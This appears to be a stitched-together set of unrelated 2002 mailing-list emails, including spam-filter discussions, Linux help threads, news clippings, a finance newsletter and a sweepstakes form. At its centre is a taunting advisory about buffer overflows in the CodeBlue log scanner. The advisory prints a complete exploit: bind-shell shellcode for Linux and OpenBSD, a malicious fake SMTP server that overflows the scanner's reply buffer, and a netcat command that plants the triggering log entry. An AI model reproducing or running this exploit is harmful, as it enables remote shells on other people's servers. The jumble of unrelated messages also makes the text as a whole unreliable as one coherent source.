&gt; hacking around.
&gt; 
&gt; --
&gt; Randomly Generated Tagline:
&gt; D'oh!  English!  Who needs that?  I'm never going to England. Come on,
&gt;  let's smoke.
&gt; 
&gt;                 -- Homer Simpson, talking Barney into cutting class
&gt;                    The Way We Was
&gt; 
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by:ThinkGeek
&gt; Welcome to geek heaven.
&gt; http://thinkgeek.com/sf
&gt; _______________________________________________
&gt; Spamassassin-talk mailing list
&gt; Spamassassin-talk@lists.sourceforge.net
&gt; https://lists.sourceforge.net/lists/listinfo/spamassassin-talk-- 
========================
Kevin W. Gagel
Network Administrator
College of New Caledonia
gagel@cnc.bc.ca
postmaster@cnc.bc.ca
(250)562-2131 loc. 448
========================--------------------------------
The College of New Caledonia    
Visit us at http://www.cnc.bc.ca
--------------------------------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</si>
  <si>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
"Hess, Mtodd, /mth" said:&gt; I hate to bring this up, but I see more and more spams that contain very
&gt; little, if any, text.  Instead, most of the spam text is in a graphic image.
&gt; How will we be able to detect those as spam?  OCR?or, alternatively, giveaway patterns in the HTML?  That's what's happening
with most obfuscating techniques the spammers are trying -- they become
a very reliable sign of spam in themselves!--j.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</si>
  <si>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TITLE: Potential remote root in CodeBlue log scanner
NAME: DEMI SEX GOD FROM HELL ADV 00001
DATE: YES, PLEASE MAIL ME IF YOU ARE FEMALE (send pictures)
CRAZY TRACKING NUMBER THAT MAKES IT LOOK LIKE I HAVE SOME MASSIVE DATABASE OF
JUAREZ: 7363A64B02Props to dme@#!Information
-----------you may remember me from sweaty nights of passion, or perhaps from yesterday when
i announced the release of a piece of software i wrote (many years ago too
btw).in general i received no feedback from this, cept from one guy having problems
downloading it (howd that go btw?) and then this:From: "Michael"
To: "'Demi Sex God from Hell'"
Subject: RE: ass the attack spoofing shellAnnoying. Pointless.well!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(www.tenebrous.com). I got codeblue, (btw mystical
mike your auto-download script for you counter gives me a 500 error), a log
checking utility mystical mike wrote and released under the GNU GPL to make
the world a better place.If this tool is run as root (say nightly from roots crontab) there is a
potential remote root. in any case, regardless of user, there is
always a remote. if codeblue is locally suid, theres many overflows all
throughout it, easy peasy like the girls in st patricks!!!.Note st patricks is a great place in sydney, playground of the rich and
famous. visit it if you ever visit sydney, tell them i sent you.so lets have a walk through the code, and get a feel for mystical mike, the
man behind the mystic. (do you wear a crazy robe with a hood like a monk
mike?)$ cd codeblue
$ ls
CHANGES     COPYING     Makefile    README      codeblue.c
$ head COPYING
                    GNU GENERAL PUBLIC LICENSE
                       Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc.
     59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.                            Preamble/* uh-oh */$ vi codeblue.c
/*
 * $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01
 * root Exp root $
 *
 ******************************************************************************************
 *                      -[ G O D  B L E S S  A M E R I C A ]-
 *
 ******************************************************************************************
 *
 *            CodeBlue v5.0 by Michael (mystic@tenebrous.com)
 *  This software is freely distributable under the terms of the GNU/GPL.
 *                    Please see file 'COPYING'/* god bless america, AND mystical mike! */..../* line ~273 */
/*
 * siginal_init:
 * sets up all the signals we'd like
 * to handle specially
 */
void signal_init(void)
{
    struct sigaction sa_old, sa_new;    /* signal handling */
    sa_new.sa_handler = signal_handler;
    sigemptyset(&amp;sa_new.sa_mask);
    sa_new.sa_flags = 0;
    sigaction(SIGINT, &amp;sa_new, &amp;sa_old);
    sigaction(SIGPIPE, &amp;sa_new, &amp;sa_old);
}/* shared signal handler doing all sorts of stuff, not very good mike :( *//* line ~289 *//*********************************************************************
 * Our close() wrapper
 */
int Close(int sd)
{
    return (close(sd));
}/* that just made me laugh *//* line ~661 */char logline[512]; /* logline is global */int scan_file(FILE * fp)
{
    char buffer[1024];....        fgets(buffer, 1024, fp);....        if (found_infected == 1) { /* if it picks up a worm entry in the */
				   /* log this is true */            strcpy(logline, buffer);	    /* oh dear *//* line ~827 */char reply[512]; /* global */
char whoispath[512] = "/usr/bin/whois"; /* global */int main(int argc, char **argv)
{ 	.....            if (argv[i][0] == '-')
                switch (argv[i][1]) {
                case 'e':{      /* return email address */
                        if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))
                            DieWithRequire(argv[i]);
                        strcpy(reply, argv[i + 1]);
                        break;
                    }
                case 'p':{      /* path to whois binary */
                        if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))
                            DieWithRequire(argv[i]);
                        strcpy(whoispath, argv[i + 1]);
                        break;
                    }	/* whoops! */
Now, all this is good for a laugh, but unless its suid, not much use :(CodeBlue will scan apache/squid logfiles looking for code red and nimda log
hits. If it finds a hit, it will connect to the source ip adress of the hit
and send an email warning of infection. Unfortunately, mystical mike was too
far up on his high horse to write something decent.The function that does this is send_email() (line ~552)It starts off like this:int send_email(void)
{
	int sd;
	char *host = malloc(sizeof(char) * 512);/*  .... silly crap using popen and stuff .... */	/* host is the infected host from the logfiles
 	 * this will connect to the host on port 25
	 */    if ((sd = smtp_connect(host)) &lt; SUCCESS)
        return -1;/* Step 0 - Get initial server response */
    get_smtp_reply(sd);/* this is the function of interest *//* line ~345 */
/*********************************************************************
 * fetches a reply from the SMTP server
 */
int get_smtp_reply(int sd)
{
    char response[1024]; /* this is the remote host's mail server buf */	....
    /*
     * We'll loop infinately, receiving
     * 1 byte at a time until we receive a carriage return
     * or line-feed character, signifying the end of the output
     */
	/* GEE! THAT SOUNDS LIKE A GOOD IDEA MYSTICAL MIKE#@!#@! */	....    while (TRUE) {
        if (select((sd + 1), &amp;rset, NULL, NULL, &amp;tv) &lt; 0) {
            if (errno != EINPROGRESS) {
                fprintf(stderr, "[ ERROR: select() failed: %s\n",
                        strerror(errno));
                return -1;
            }
        }
        if (recv(sd, (int *) &amp;response[i], 1, RECV_FL) &lt; 0) { /* Hello */
            if (errno == EAGAIN) {
                if (elapsed &gt;= smtp_timeout) {
                    fprintf(stderr, "[ ERROR: operation timed out\n");
                    fprintf(log, "..... ERROR: operation timed out\n");
                    return -1;
                }
                elapsed++;
                usleep(smtp_timeout * 10000);
                continue;
            } else {
                if (!(flags &amp; FL_BEQUIET))
                    fprintf(stderr, "[ ERROR: recv() failed: %s\n",
                            strerror(errno));
                fprintf(log, "..... ERROR: recv() failed: %s\n",
                        strerror(errno));
                return -1;
            }
        }
        if ((response[i] == '\n')
            || ((response[i] == '\n') &amp;&amp; (response[i + 1] == '\n')))
            break;
        i++; /* come here often baby? */
    }So slowly but surely, response is overrun, unless it its a newline.
/*
 * hi, this is an exploit that doesnt work. it should be enough of a point in
 * the right direction though. the overflow is in get_smtp_reply(), codeblue.c
 * is pretty damn poor, there are more!!!
 *
 * being in a funny mood one afternoon, i made some software publicly
 * available, the next morning i see this in my mailbox:
 *
 * ------- begin spouting off  ------
 * From mystic@tenebrous.com Mon Jul 22 19:50:46 2002
 * Return-Path:
 * Delivered-To: doe@orbital.wiretapped.net
 * Received: (qmail 2711 invoked from network); 22 Jul 2002 19:50:45 -0000
 * Received: from mail110.mail.bellsouth.net (HELO imf10bis.bellsouth.net)
 * (205.152.58.50)
 *  by orbital.wiretapped.net with SMTP; 22 Jul 2002 19:50:45 -0000
 * Received: from Michaels ([68.16.174.6]) by imf10bis.bellsouth.net
 *         (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
 *         id &lt;20020722195143.XJOI21884.imf10bis.bellsouth.net@Michaels&gt;
 *         for ; Mon, 22 Jul 2002 15:51:43 -0400
 * From: "Michael"
 * To: "'Demi Sex God from Hell'"
 * Subject: RE: ass the attack spoofing shell
 * Date: Mon, 22 Jul 2002 15:50:13 -0400
 * Message-ID: &lt;000101c231b8$fedc7740$0200a8c0@Michaels&gt;
 * MIME-Version: 1.0
 * Content-Type: text/plain;
 *	charset="us-ascii"
 * Content-Transfer-Encoding: 7bit
 * X-Priority: 3 (Normal)
 * X-MSMail-Priority: Normal
 * X-Mailer: Microsoft Outlook, Build 10.0.2616
 * Importance: Normal
 * X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
 * In-Reply-To:
 * Status: RO
 *
 * Annoying. Pointless.
 *
 * ------- end spouting off -------
 *
 * HOW RUDE!@##@!@#!
 *
 * so i had a visit to www.tenebrous.com, found some software written by this
 * master coder, and here we are now.
 *
 * To use this against a webserver (A) using codeblue.
 *
 * $ printf "GET /scripts/root.exe\r\n\r\n" | nc A 80
 *
 * this will add an entry in the access log.
 *
 * ON THE SAME HOST:
 *
 * # ./mystic_anus 25
 *
 * wait a while.
 *
 * when codeblue runs it will pull your ip from the logs, connect to your port
 * 25 and try to send you a mail. because mystic is an idiot, you will get a
 * shell with the openbsd code!!!
 *
 * i like exclamation marks !!!!
 *
 * krad haxxor props: dedmunk (happy now#@!!#@) ph1ll1p, caddis, buo, solace,
 * everyone on #cw , everyone in paris (you have a lovely city, i had a lovely
 * time last weekend, thankyou!!!) dedmunk, everyone at netcraft (esp Mike,
 * hi!), everyone in sydney, dedmunk, everyone i go drinking with, anyone who
 * lives in london, marlinspike (yo!), the woman who sells me my cigarettes in
 * the morning on the way into work, thomas greene, dedmunk, adam, durab, sh00ter.
 *
 * BIG SHOUT OUT TO TOLIMAN AND ZERO SUM, UNDERSTAND!!
 *
 * propz to dme#!@#!@
 *
 * dont forget:
 *
 * $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01 root Exp root $
 *
 ******************************************************************************************
 *                      -[ G O D  B L E S S  A M E R I C A ]-                             *
 ******************************************************************************************
 *
 */#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define OF 2048 /* this is bigger than needed *//* Optimized the code, now it works better in bad situations */
/* i dont know who wrote this, sorry, if you wrote it, let me know */char lunix_shellcode[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
/*
 shell on port 6969/tcp shellcode for OpenBSD by noir
*/long bsd_shellcode[]=
{
  0x4151c931,0x51514151,0x61b0c031,0x078980cd,
  0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
  0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
  0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
  0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
  0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
  0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
  0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
  0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
  0x90416873
};int main(int argc, char *argv[])
{
	struct 	sockaddr_in sock_in;
	struct 	sockaddr_in sock_out;
	char 	*port = "25";
	int 	fd, a;
	int 	len;
	int		opt;
	char bigbuf[OF];
	char *p;
	long lunix_resp = 0xbfffe0ac;
	long bsd_resp = 0xdfbfc068;
	char *moo = "220 ";	long resp = lunix_resp;
	char *shellcode = lunix_shellcode;	printf("strlen scode = %d\n", strlen(shellcode));
	if (argc == 2)
		port = argv[1];	if (argc &gt; 2) {
		fprintf(stderr, "usege: %s [port]\n", argv[0]);
		exit(1);
	}	resp += 8;	p = bigbuf;
	memcpy(p, moo, 4);
	p += 4;
	memset(p, '\x90', 1020 - strlen(shellcode));
	p += 1020 - strlen(shellcode);
	memcpy(p, shellcode, strlen(shellcode));
	p += strlen(shellcode);
	memcpy(p, &amp;resp, 4);
	p += 4;
	memcpy(p, &amp;resp, 4);
	p += 4;
	memset(p, '\n', 4);	if ((fd = socket(PF_INET, SOCK_STREAM, 0)) &lt; 0){
		perror("socket");
		exit(1);
	}	memset(&amp;sock_in, 0, sizeof(sock_in));
	sock_in.sin_family = AF_INET;
	sock_in.sin_port = htons(atoi(port));
	sock_in.sin_addr.s_addr = INADDR_ANY;
	len = sizeof(sock_in);	opt = 1;
	if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &amp;opt, sizeof(int)) == -1) {
			perror("setsockopt");
			exit(1);
	}	if (bind(fd, (struct sockaddr *)&amp;sock_in, len) &lt; 0) {
		perror("bind");
		exit(1);
	}	if (listen(fd, 5) &lt; 0) {
		perror("listen");
		exit(1);
	}	printf("listening on port %d\n", atoi(port));	for (;;) {
		len = sizeof(sock_out);
		if ((a = accept(fd, (struct sockaddr *)&amp;sock_out, &amp;len)) &lt; 0){
			perror("accept");
			exit(1);
		}
		printf("got a connection from %s\n", inet_ntoa(sock_out.sin_addr));
		fflush(stdout);		write(a, bigbuf, sizeof(bigbuf));
		close(a);
	}	return(1);}
</t>
  </si>
  <si>
    <t xml:space="preserve">
http://news.bbc.co.uk/1/hi/scotland/2515231.stm
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/46VHAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">NFS as a protocol is not known for its speediness but this is absurd. I did an 
NFS install of a box this morning (that would be the box which won't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 it was transferring about 8MB a MINUTE. 
So I killed that and used rsync instead which is ticking away now at about 
100 MB/min - still not exactly turbo charged but a lot better than the NFS 
rate. Any ideas as to what's making it SO slow ? There's really no point in 
running more nfsd processes, as there is exactly one client, so I'm a little 
at a loss I must say.Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/england/2515127.stmA bizarre collection of stuffed animals could fetch up to Â£2m when it is
sold by a Cornwall museum.
The Museum of Curiosities is home to a menagerie of 10,000 Victorian stuffed
animals.
The museum, next to the Jamaica Inn on Bodmin Moor, gets about 30,000
visitors a year.
But now the inn's owner Kevin Moore has decided to sell.Stuffed frogs are for saleMr Moore said: "It was very fashionable to have taxidermy on your
mantlepiece in Victorian times, but it is not really in favour now."
Nevertheless, figures of up to Â£2m for the collection have been discussed.
The museum was opened in 1861 by taxidermist Walter Potter.
Tableaux include a kittens tea party, cricket-playing guinea pigs and
swinging frogs.
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Share the magic of Harry Potter with Yahoo! Messenger
http://us.click.yahoo.com/4Q_cgB/JmBFAA/46VHAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;-- be careful when using this one.) Also, that really cute thing 
that
&gt; &gt;Japanese AV girls do of leaving their panties on one leg while 
making loveDare I ask what a Japanese "AV girl" is? 
timh
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/46VHAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "SM" == Skip Montanaro  writes:  Jeremy&gt; Put another way, I'd be interested to hear why you don't
  Jeremy&gt; want to use ZODB.  SM&gt; Disclaimer: I'm not saying I don't want to use ZODB.  I'm
  SM&gt; offering some reasons why it might not be everyone's obvious
  SM&gt; choice.But you're not saying you do want to use ZODB, so you're still part of
the problem .  SM&gt; For most of us who have *any* experience with ZODB it's probably
  SM&gt; all indirect via Zope, so there are probably some inaccurate
  SM&gt; perceptions about it.  These thoughts that have come to my mind
  SM&gt; at one time or another:  SM&gt; * How could a database from a company (Zope) whose sole business
  SM&gt;       is not databases be more reliable than a database from
  SM&gt;       organizations whose sole raison d'etre is databases
  SM&gt;       (Sleepycat, Postgres, MySQL, ...)?I don't think I could argue that ZODB is more reliable that
BerkeleyDB.  It's true that we have fewer database experts and expend
fewer resources working on database reliability.  On the other hand,
Barry is nearly finished with a BerkeleyDB-based storage for ZODB.ZODB is an object persistence tool that uses a database behind it.
You can use our FileStorage or you can use someone else's database,
although BerkeleyDB is the best we can offer at the moment.  (It would
be really cool to do a Postgres storage...)  SM&gt; * Dealing with Zope's monolithic system is frustrating to people
  SM&gt;       (like me) who are used to having files reside in
  SM&gt;       filesystems.  Some of that frustration probably carries
  SM&gt;       over to ZODB, though it's almost certainly not ZODB's
  SM&gt;       problem.
This sounds like a Zope complaint that doesn't have anything to do
with ZODB, but maybe I misunderstand you.  You don't have to store
your code in the database, although that will be mostly possible in
ZODB4.Seriously, ZODB stores object pickles in a database.  The storage
layer is free to manage those pickles however it likes.  FileStorage
uses a single file.  Toby Dickenson's DirectoryStorage represents each
pickle as a separate file.  SM&gt; * It seems to grow without bound, else why do I need to pack my
  SM&gt;       Data.fs file every now and then?It grows without bound unless you pack it.  Why is that a problem? 
BerkeleyDB log files grow without bound, too.  Databases require some
tending.  One possibility with FileStorage is to add an explicit
pack() call to update training operation.  We'd need to think
carefully about the performance impact.  SM&gt; Also, there is the issue of availability.  While it's just an
  SM&gt; extra install, its use requires more than the usual Python
  SM&gt; install.  Having it in the core distribution would provide
  SM&gt; stronger assurances that it runs wherever Python runs (e.g.,
  SM&gt; does it run on MacOS 8 or 9, both of which I believe Jack still
  SM&gt; supports with his Mac installer?).I think we'd want a spambayes installer that packaged up spambayes,
python, and zodb.Jeremy
_______________________________________________
Spambayes mailing list
Spambayes@python.org
http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, "Mark Hammond"  is all like:&gt; So, given that, ZODB is sounding attractive.  I would package it up, so a
&gt; few hundred extra K is probably no big deal.  The code could fall back to
&gt; the slow-loading pickles, so people running from source still work, just
&gt; possibly not as well.I haven't used ZODB much really but it sure looks like the Right Way.  I
don't think it will fly with the unwashed Unix masses, but it sounds
like a piece of cake with the Windows crowd.  That makes sense; you only
have one OS vendor and one processor family to support.I'm going to go sulk in /dev/corner now.Neale_______________________________________________
Spambayes mailing list
Spambayes@python.org
http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,Now this is probably of no use to you whatsoever, but...Not a deb-head, but I also have a problem regards NVidia. I've two machines,
pretty much the same hardware. 
athlon 1700XP's, both have NVidia cards, one Gforce3 Ti and a Gforce2MX,
both use the same driver module. Both have same kernel version albeit it compiled for their particular
hardware.One works perfectly, the other fails to load. When I check with lsmod, I can
see the NVdriver is loaded, but not used ;--(
Thus when I startx, it bombs out. IU still have X with the default nv driver and crappy accelleration --&gt;
650fps with glxgears [should be over 2000fps]
Its not a hardware issue with the cards as I swapped them over and get the
same symptoms. I reckon my mobo is cack, I've tried swapping slots around, reserving
resources etc all to no avail. 
Should there be an interrupt for the nv card? I haven't checked the other
box yet.Regards,
CW-------------------
On Tue, 03 Dec 2002, Mark Page wrote:&gt; Was running Debian Woody perfectly well until I installed the NVIDIA 3D 
&gt; tar packages.You probably stil are ;)&gt; Both the kernel and GLX packages installed with no problem and I then 
&gt; amended the XFree config file appropriately (according to all 
&gt; instructions). Neither GDM nor KDM will now fire up returning me to the 
&gt; console screen. ie X is broken. &gt; Running startx I isolated the problem to a failure to load the nvidia
&gt; kernel module - By cd'ing to the kernel module file and re-running 'make
&gt; install' I can get a workable xserver so you fixed X.&gt; minus the preferences you would get from either gdm or kdm and to be
&gt; honest the GUI is horrible.If X is working and you get a brief Nvidia splash screen then this is
likely nothing to do with the driver itself.  You should be able to use kdm
or gdm with the nvidia Xserver.  What exactly did you change in your
XF86Config?  Will gdm/kdm not start?&gt; I followed the nvidia suggestion of 'make install 
&gt; SYSINCLUDE=/path/to/kernel/headers' and whilst this appears to install 
&gt; ok upon reboot I am back to the same console login and having to go 
&gt; through the same reinstall of the kernel module. I have tried rewriting 
&gt; the XF config file to it's original state with no success.Well, this sounds like the NVIDIA kernel module isn't loading on boot.
When it *is* working do a quick /sbin/lsmodand look for the module name (something like 'NVDriver').  Then put this on
a new line in /etc/modulesin order that linux will load it on boot.  You can just domodprobe nvdriverto load it by hand.  Your make install did this as well as reinstalling the
driver in /lib etc.  You should also get a message saying loading the
nvidia driver taints your kernel (which it does, in the sense that it's not
open source).&gt; Is this a problem anyone else has encountered and what is the best 
&gt; solution? Can I rid myself of the tar file installations and find some 
&gt; specific .deb packages?The nvidia driver source is in the Woody tree.http://packages.debian.org/stable/x11/nvidia-kernel-src.htmlso you can doapt-get install nvidia-kernel-srcand then compile, although I've always gone the route you're doing now.Ideally the nvidia driver would be a part of the kernel from day 1.
However, nvidia have not open sourced it (most of the above source is
pre-compiled object code), but in order for it to work with your specific
kernel you must compile against your kernel headers (as you did).  As
debian has lots of potential kernels they can't have one nvdriver package
and have chosen instead to provide the source.  Actually I don't know if
they're permitted to distribute binaries by nvidia's license anyway.Gavin-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
======================== THE MOTLEY FOOL ========================
                        PERSONAL  FINANCE 
                    Wednesday, January 2, 2002 
mkettler@home.com
=================================================================IN THIS ISSUE- ASK THE FOOL: Stop the Solicitation!
  http://www.fool.com/m.asp?i=562064- YOUR MONEY: Resolutions You Can Keep
  http://www.fool.com/m.asp?i=562065- SPOTLIGHT: Should All My Savings Be in the Market?
  http://www.fool.com/m.asp?i=562066
- COMMUNITY TIPS: Do (At Least) One Thing Differently
  http://www.fool.com/m.asp?i=562067=================================================================SPONSORED BY: Datek
Datek Online. Built to trade.
*Proprietary auto routing technology | *$9.99 commission 
for online equity trades | *60-second execution commitment.
Apply for a Datek Account Now!
http://www.lnksrv.com/m.asp?i=562068=================================================================
ASK THE FOOLQ. I'M TIRED OF GETTING SO MANY CREDIT CARD OFFERS IN THE MAIL. 
I ALREADY HAVE 
A CARD AND I DON'T WANT ANY MORE MAIL OFFERING ME NEW ONES. HOW 
CAN I STOP IT? A. There are three main credit bureaus in the United States, and 
they've agreed that if someone contacts one of them and asks to 
be removed from junk mail (er, "direct mail") lists and 
telemarketing phone lists, they'll all honor the request. Full Answer:
http://www.fool.com/m.asp?i=562069-----------------------------------------------------------------
YOUR MONEY RESOLUTIONS YOU CAN KEEP
Let's face it, New Year's resolutions are mostly nightmares that 
hang over our heads like that dark cloud that follows Eeyore 
everywhere he goes. We mostly fail to keep our resolutions 
because they are too vague and imply guilt-inducing judgment. 1. 
Live every moment. 2. Be a good person. 3. Lose a lot of weight. 
No pressure. Right? Wrong. 
http://www.lnksrv.com/m.asp?i=562070Don't despair. We've put together a quick, proactive to-do list 
that is actually doable. This year's resolution: Save big bucks 
now and live comfortably in the future. Now that's a resolution 
you can get behind. Let's get started! 1. DIAL AWAY YOUR DEBT 
It's true. You can lower your credit card interest rates with 
one phone call.
http://www.fool.com/m.asp?i=562071 2. GET MORE FROM YOUR SAVINGS
Don't stash your short-term cash savings under your mattress. 
Earn higher yields on CDs, money markets, and more. 
http://www.fool.com/m.asp?i=5620723. INVEST FOR LESS 
Make sure your broker isn't charging you too much. Compare rates 
and hire a new one in only 60 seconds. 
http://www.fool.com/m.asp?i=5620734. RETIRE EARLY
Thanks to recent tax law changes, you can start pitching in more 
to your retirement accounts.
http://www.fool.com/m.asp?i=5620745. REFINANCE AND SAVE 
When interest rates drop, some homeowners have the opportunity 
to save big money.
http://www.fool.com/m.asp?i=562075If this list seems too daunting, and you don't want to go it 
alone, you can get some unbiased, professional advice about your 
finances with TMF Money Advisor. In fact, we're so excited about 
this service, we are offering a free one-month trial 
subscription. For more information, go here. 
http://www.fool.com/m.asp?i=562076For more money-saving tips to aid your journey to Financial 
Independence, visit our Personal Finance area. 
http://www.fool.com/m.asp?i=562077-----------------------------------------------------------------
SPOTLIGHTSHOULD ALL MY SAVINGS BE IN THE MARKET?
Um, no. We are big supporters of the idea that all of your long-term 
money should be in the stock market. But over the short term, 
the market is too volatile. Buying stocks for short-term gain is 
really speculating, not investing. Would you have wanted to have 
your emergency fund, or your house down payment, or your kid's 
tuition in the Nasdaq at its height on March 10, 2000? If you 
can't afford or wait out a 30% drop in the value of your 
savings, keep it out of the market.Of course, we're not just going to leave you hanging. To figure 
out the best place to keep your short-term savings, visit our 
nifty Savings Center. 
http://www.fool.com/m.asp?i=562078-----------------------------------------------------------------
COMMUNITY TIPSDO (AT LEAST) ONE THING DIFFERENTLY
Folks on the Living Below Your Means discussion board have been 
sharing at least one thing they are going to do differently in 
2002 to save money. -I am going to make sure I carry my coupon envelope in my purse 
 so I don't find myself at the grocery store buying a bunch of 
 stuff on which I could save a bunch of money if I hadn't left my 
 coupons at home. -Make sure I get reimbursed for every dime my company owes me. I 
 have a bad habit of not filing expense reports for little stuff, 
 like 10 miles of mileage to go to a mediation. Ten miles is 
 $3.10 and if I do that 10 times a year, that's more than 30 
 bucks, and definitely worth filing an expense report for. -I'm going to make at least one crock-pot meal a week so I don't 
 get tempted to go out and buy something to eat. Fridays would be 
 a great time to do this. -Either cut down on the long-distance phone calls, or else find 
 a cheaper long-distance plan.-Document everything that I give to charity, including the 
 clothes and books, so that I can deduct it from my taxes. -Keep turning down the thermostat at night and when I leave the 
 house. Run my humidifier (moist air is cheaper to heat). Have any tips of your own? Add to the growing list here.
http://www.fool.com/m.asp?i=562079=================================================================
SPONSORED BY: Datek
Datek Online. Built to trade.
*Proprietary auto routing technology | *$9.99 commission 
for online equity trades | *60-second execution commitment.
Apply for a Datek Account Now!
http://www.lnksrv.com/m.asp?i=562080
=================================================================My Portfolio: http://www.fool.com/m.asp?i=562081
My Discussion Boards: http://www.fool.com/m.asp?i=562082	 
WANNA TAKE THE SHORTCUT?
Check out our new Crash Courses, the fastest way to get
your finances in order. Get results in less than an hour, for
just $10. Try one today!
http://www.fool.com/m.asp?i=562083PERKS FOR FOOLS ONLY
Get free stuff and special offers, just for you!
http://www.fool.com/m.asp?i=562084CUSTOMER SERVICE
Ask our staff for help with email delivery problems.
http://www.fool.com/m.asp?i=562085
UNSUBSCRIBE
Here's how to unsubscribe or change your settings.
http://www.fool.com/community/freemail/freemaillogin.asp?email=mkettler@home.com_____________________________________________________
Copyright (c) 1995-2001 The Motley Fool. All rights reserved.
Legal Information: http://www.fool.com/m.asp?i=562086MsgId: msg-7678-2002-01-02_13-22-47-4816731_25_Plain_MessageAddress.msg-13:51:39(1-02-2002)
X-Version: mailer-sender-master,v 1.84 
X-Version: mailer-sender-daemon,v 1.84 
Message-Recipient: mkettler@home.com
</t>
  </si>
  <si>
    <t>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12/31/02.Follow these instructions to claim your prize:1.	Print out this email message.2.	Complete ALL of the information requested.  Print clearly and legibly.  Sign
 where indicated.3.	If you are under 18 or otherwise under the legal age of majority in your
 state, your parent or legal guardian must co-sign where indicated below.4.	Mail the completed and signed form to:  3D's(R) Malcolm in the Middle(TM)
 Sweepstakes, Redemption Center, PO Box 1520, Elmhurst IL 60126.  WE MUST
 RECEIVE THIS FORM NO LATER THAN MAY 28, 2002 IN ORDER TO SEND YOU THE PRIZE.PLEASE DO NOT ATTEMPT TO REPLY TO THIS EMAIL.  THE ONLY WAY TO CLAIM THE PRIZE
 IS TO FOLLOW THE INSTRUCTIONS ABOVE.  YOUR PRIZE WILL BE MAILED TO YOU WITHIN 6
 TO 8 WEEKS OF RECEIPT OF THIS FORM.Once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_______________________________2.	My date of birth is:   _______________________________________3.	My telephone number is:   __________________________________4.	My home address is:   _____________________________________			      _____________________________________5.	My email address is:   _____________________________________6.	I am a legal resident of the State of:   _________________________7.	I am above the legal age of majority in my state of residence or my parent or
 legal guardian has co-signed below.8.	I represent that I (1) have fully complied with all of the Official Rules of
 the Sweepstakes, and (2) have not committed any fraud or deception in
 participating in the Sweepstakes or in accepting the Prize.9.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_______________________________Signature:		_______________________________Date:			_______________________________IF WINNER IS A MINOR IN HIS OR HER STATE OF RESIDENCE, WINNER'S PARENT OR LEGAL
 GUARDIAN MUST COMPLETE THE INFORMATION BELOW: I am the parent or legal guardian of the winner who has signed the foregoing
 Release. I AGREE TO THE TERMS OF THE RELEASE AND CONSENT TO THE ACCEPTANCE OF
 THE PRIZE ON THE WINNER'S BEHALF.Parent/Guardian's Name [print full name]:	_______________________________Parent/Guardian's Signature:			_______________________________Date:						_______________________________2002 OFFICIAL RULES
3D's(R) Malcolm in the Middle(TM) SweepstakesOPEN ONLY TO LEGAL U.S. RESIDENTS LOCATED IN THE U.S. AT THE TIME OF ENTRY. VOID
